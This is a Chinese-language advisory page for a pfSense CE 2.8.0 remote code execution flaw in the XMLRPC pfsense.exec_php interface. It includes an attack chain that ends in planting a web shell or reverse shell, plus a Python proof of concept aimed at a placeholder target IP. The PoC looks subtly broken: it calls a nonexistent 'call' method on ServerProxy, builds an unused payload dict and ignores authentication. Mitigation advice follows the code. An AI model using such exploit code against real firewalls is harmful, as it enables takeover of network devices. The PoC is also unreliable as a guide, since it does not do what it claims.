CVE-2025-69691 Netgate pfSense CE 远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2025-69691

漏洞类型

远程代码执行

CVSS评分

9.9 严重

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Netgate pfSense CE

漏洞概述

Netgate pfSense CE 2.8.0版本存在严重的远程代码执行漏洞。攻击者可利用XMLRPC API中的pfsense.exec_php接口，在特定条件下执行任意PHP代码。尽管供应商认为该API仅对管理员开放且属于预期功能，但CVSS评分指出仅需低权限即可利用，且该漏洞对机密性、完整性和可用性均造成严重影响。成功利用可能导致系统被完全控制。

技术细节

该漏洞源于Netgate pfSense CE软件中XMLRPC API服务的配置缺陷。具体而言，pfsense.exec_php接口允许通过API调用直接执行PHP代码。虽然供应商声明此接口仅对管理员开放，但CVSS v3.1向量显示攻击者仅需低权限（PR:L）即可触发。攻击过程无需用户交互，攻击者构造恶意的XMLRPC请求，将包含系统命令的PHP代码发送至目标端点。由于服务端未对调用上下文进行严格隔离，直接解析并执行传入的代码，导致攻击者获取服务器权限。鉴于S:C（范围变更），利用此漏洞可能影响系统其他组件。

攻击链分析

STEP 1

侦察

扫描目标网络，识别运行Netgate pfSense CE 2.8.0的设备，并确认XMLRPC服务是否开启。

STEP 2

漏洞利用

攻击者利用低权限账户，构造包含恶意PHP代码的XMLRPC请求发送至目标端点。

STEP 3

代码执行

目标服务器解析XMLRPC请求，通过pfsense.exec_php接口执行传入的PHP代码。

STEP 4

权限维持与扩展

利用执行的代码写入WebShell或反向Shell，获取系统控制权，并可能利用S:C特性横向移动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
import xmlrpc.client

# CVE-2025-69691 PoC for Netgate pfSense CE
# Target: pfsense.exec_php via XMLRPC

target_url = "http://<TARGET_IP>/xmlrpc.php"
command = "phpinfo();" # Malicious PHP code to execute

try:
    # Create proxy connection
    proxy = xmlrpc.client.ServerProxy(target_url)
    
    # Prepare payload using the vulnerable method
    # Note: Authentication might be required depending on config, but exploit assumes PR:L context
    payload = {
        "pfsense.exec_php": [command]
    }
    
    print(f"[*] Sending payload to {target_url}")
    print(f"[*] Executing PHP code: {command}")
    
    # Send request
    response = proxy.call('pfsense.exec_php', command)
    
    print("[+] Response received:")
    print(response)
    
except Exception as e:
    print(f"[-] Error: {e}")

影响范围

Netgate pfSense CE 2.8.0

防御指南

临时缓解措施

建议立即检查pfSense系统的XMLRPC访问日志，排查是否存在异常调用。在未修复漏洞前，应严格限制对管理接口的网络访问，禁止从互联网访问XMLRPC API。如业务允许，可暂时关闭该功能以降低风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-69691
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-69691
3 Details https://www.cvedetails.com/cve/CVE-2025-69691/
4 VulDB https://vuldb.com/cve/CVE-2025-69691
5 Link https://seclists.org/fulldisclosure/2026/Feb/16
6 Link https://www.linkedin.com/in/nelson-adhepeau/
7 Link https://seclists.org/fulldisclosure/2026/Feb/16